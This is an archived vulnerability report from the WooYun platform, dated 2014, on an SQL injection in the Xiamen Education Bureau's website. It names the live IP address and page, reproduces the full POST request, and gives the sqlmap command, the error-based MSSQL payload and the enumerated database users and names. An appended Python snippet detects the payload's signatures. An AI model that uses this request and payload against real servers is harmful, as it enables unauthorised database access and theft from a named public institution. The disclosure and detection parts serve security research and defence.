
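Vulnerability summary

Bug ID: wooyun-2014-073465

Title: SQL injection in the Xiamen Education Bureau website, database can be dumped

Vendor: CCERT (education network emergency response team)

Author: 小饼仔

Submitted: 2014-08-25 14:42

Fixed: 2014-08-30 14:44

Disclosed: 2014-08-30 14:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CCERT education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]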



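Vulnerability details

Disclosure status:

2014-08-25: Details reported to the vendor, awaiting vendor handling
2014-08-30: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

POST injection in the Xiamen Education Bureau website; the database can be dumped.
The site has a new version and an old version.
Going directly to http://www.xmedu.gov.cn/ gives the new version.
Entering via http://220.160.119.31:81 gives the old version.
The old version's home page content is out of date, but the content under 政民互动 (government-citizen interaction) is recent, and that is where the injection is; this page cannot be found in the new version.
One of the databases is named HuilanCInfo; I looked it up and it is 中科汇联 http://www.huilan.com/

Detailed description:

URL: http://220.160.119.31:81/tabid/289/Default.aspx

[Image: 证据1.jpg]


The page's search query is injectable. POST request: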
POST /tabid/289/Default.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://220.160.119.31:81/tabid/289/Default.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7de28324bf0da6
Accept-Encoding: gzip, deflate
Host: 220.160.119.31:81
Content-Length: 10130
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: .ASPXANONYMOUS=htWCec7zzwEkAAAAMGNiNDdjYjYtZThlNC00NjY1LWFiOTktZWNiZjBjNTZkZDRl0; language_0=zh-CN; CNZZDATA5143399=cnzz_eid%3D2076919176-1408624673-%26ntime%3D1408624673
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTTARGET"
ess$ctr1035$InteractConsultList$libSearch
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__VIEWSTATE"
[__VIEWSTATE value removed]
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ScrollTop"
228
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__essVariable"
{"__scdoff":"1","__ess_pageload":"__ess_setScrollTop();"}
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="Q"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$ddlCategoryId"
-1
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtKeyWord"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtName"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$wuPager$txtPageNum"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu"
各区教育局
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu2"
直属单位
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu4"
直属学校
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu6"
省市教育站点
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu5"
省政府机关
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu7"
专题网站
-----------------------------7de28324bf0da6--
The following field is vulnerable to error-based injection:
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143

Proof of vulnerability:

python sqlmap.py -r post.txt --current-user --current-db --is-dba --users
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: MULTIPART #9*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: -----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTTARGET"
ess$ctr1035$InteractConsultList$libSearch
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__VIEWSTATE"
[__VIEWSTATE value removed]
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ScrollTop"
228
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__essVariable"
{"__scdoff":"1","__ess_pageload":"__ess_setScrollTop();"}
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="Q"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$ddlCategoryId"
-1
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtKeyWord"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143' AND 4900=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(111)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (4900=4900) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'fBuH'='fBuH
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtName"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$wuPager$txtPageNum"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu"
各区教育局
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu2"
直属单位
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu4"
直属学校
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu6"
省市教育站点
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu5"
省政府机关
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu7"
专题网站
-----------------------------7de28324bf0da6--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'dtxmedu'
current database: 'xmedu'
current user is DBA: False
database management system users [2]:
[*] dtxmedu
[*] sa
Databases:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'dtxmedu'
available databases [8]:
[*] HuilanCInfo
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xmedu
HuilanCInfo: 中科汇联 http://www.huilan.com/?
Tables in the xmedu database:

Fix:

Don't know

Copyright notice: when reposting, please credit the source 小饼仔@乌云 (WooYun)
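
As an added example (not part of the original report and not the vendor's code), the following Python code parses a multipart/form-data body in the format of the captured request, applies a digits-only allow-list to the txtIndexNumber field, and flags the MSSQL error-based shapes visible in the sqlmap payload. The allow-list pattern, the signature set and the helper names are assumptions; the sample bodies are constructed.

```python
import re
from email import message_from_bytes

# Field the report identifies as injectable; the captured request sends 30143 in it.
INDEX_FIELD = "ess$ctr1035$InteractConsultList$txtIndexNumber"
INDEX_ALLOWED = re.compile(r"\d{1,10}")  # assumption: index numbers are short digit strings

# Shapes present in the payload shown in the report (MSSQL error-based technique).
SIGNATURES = {
    "convert-int": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "char-concat": re.compile(r"char\s*\(\s*\d+\s*\)\s*\+\s*char\s*\(", re.I),
    "quote-boolean": re.compile(r"'\s*(and|or)\b", re.I),
}

def parse_multipart(content_type: str, body: bytes) -> dict:
    """Return {field name: value} for a multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    fields = {}
    for part in message_from_bytes(raw).walk():
        name = part.get_param("name", header="content-disposition")
        if name is not None:  # the multipart container itself has no field name
            value = part.get_payload(decode=True).decode("utf-8", "replace")
            fields[name] = value.strip()
    return fields

def inspect_request(content_type: str, body: bytes) -> list:
    """Return (field, reason) findings; an empty list means nothing was flagged."""
    findings = []
    for name, value in parse_multipart(content_type, body).items():
        if name == INDEX_FIELD and value and not INDEX_ALLOWED.fullmatch(value):
            findings.append((name, "not-numeric"))
        findings += [(name, tag) for tag, rx in SIGNATURES.items() if rx.search(value)]
    return findings

def build_body(boundary: str, fields: dict) -> bytes:
    """Hypothetical helper that builds constructed sample bodies in the request's format."""
    out = "".join(f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
                  for k, v in fields.items())
    return (out + f"--{boundary}--\r\n").encode("utf-8")

BOUNDARY = "---------------------------7de28324bf0da6"
CTYPE = f"multipart/form-data; boundary={BOUNDARY}"
# Constructed samples: a benign search, and one carrying the shape of the reported payload.
BENIGN = build_body(BOUNDARY, {"jumpMenu": "x", INDEX_FIELD: "30143"})
PROBE = build_body(BOUNDARY, {INDEX_FIELD: "30143' AND 4900=CONVERT(INT,(SELECT CHAR(113)+CHAR(97))) AND 'a'='a"})

if __name__ == "__main__":
    print(inspect_request(CTYPE, BENIGN))
    print(inspect_request(CTYPE, PROBE))
```

Checks like this serve as detection and defence in depth at the edge. The injection itself is closed on the server by binding the field as a query parameter instead of concatenating it into the SQL text.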


Vulnerability response

Vendor response:

Severity: no impact (ignored by vendor)

Ignored at: 2014-08-30 14:44

Vendor reply:

Latest status:

None


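Vulnerability comments:

Comments

  1. 2014-09-05 10:02 | 茜茜公主 (regular white hat | Rank: 2360, vulnerabilities: 406 | Our second baby was just born, busy changing diapers these past months... so...)

    Uh, why was this ignored?

  2. 2014-09-05 10:03 | 茜茜公主 (regular white hat | Rank: 2360, vulnerabilities: 406 | Our second baby was just born, busy changing diapers these past months... so...)

    I actually see xmedu here; isn't that the education bureau's database? As expected, it is different from what I found, so I can submit another one.

  3. 2014-09-05 10:04 | 茜茜公主 (regular white hat | Rank: 2360, vulnerabilities: 406 | Our second baby was just born, busy changing diapers these past months... so...)

    Uh, I replied in the wrong place... sorry.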